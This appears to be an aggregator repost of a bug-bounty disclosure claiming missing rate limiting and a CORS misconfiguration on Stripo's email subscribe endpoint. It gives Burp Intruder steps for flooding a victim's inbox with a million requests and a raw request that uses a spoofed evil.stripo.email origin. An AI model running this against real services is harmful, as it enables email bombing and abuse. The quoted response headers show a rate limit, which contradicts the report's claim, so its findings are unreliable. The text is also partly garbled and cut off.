๐ Stripo Inc: No rate limiting for subscribe email + lead to Cross origin misconfiguration
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Summary: I found bypass no rate limiting using Access-Control-Allow-Origin: and look the response as 200 vulnerable No rate limit means their is no mechanism to protect against the requests you made in a short frame of time. If the repetition doesn't give any error after 50, 100, 1000 repetitions then their will be no rate limit set. vulnerable has registred in #297359 #774050 #922470 URL Effected https://stripo.email/subscribe/ Step-by-step Reproduction Instructions: Go to url https://stripo.email/ and scrolls look the subscribe button Add the victim emails, and repreat to burp-suite Sent request to burp-intruder, and clear all payloads ยง In the payloads set a null-payloads and run intruder Boom 1Million request sent to victim-email Request ``` POST /subscribe/ HTTP/1.1 Host: stripo.email X-Requested-With: XMLHttpRequest Content-Length: 126 Origin: https://evil.stripo.email Connection: close Referer: https://evil.stripo.email/ _token=ยงยง&source=LANDING&subscribe-email=hostbugbounty%40gmail.com&g-recaptcha-response= **Responsive Vulnerability** HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Nov 2020 04:33:08 GMT Content-Type: application/json Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: private, must-revalidate pragma: no-cache expires: -1 X-RateLimit-Limit: 20 X-RateLimit-Remaining: 14 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN Access-Control-Allow-Origin:... ...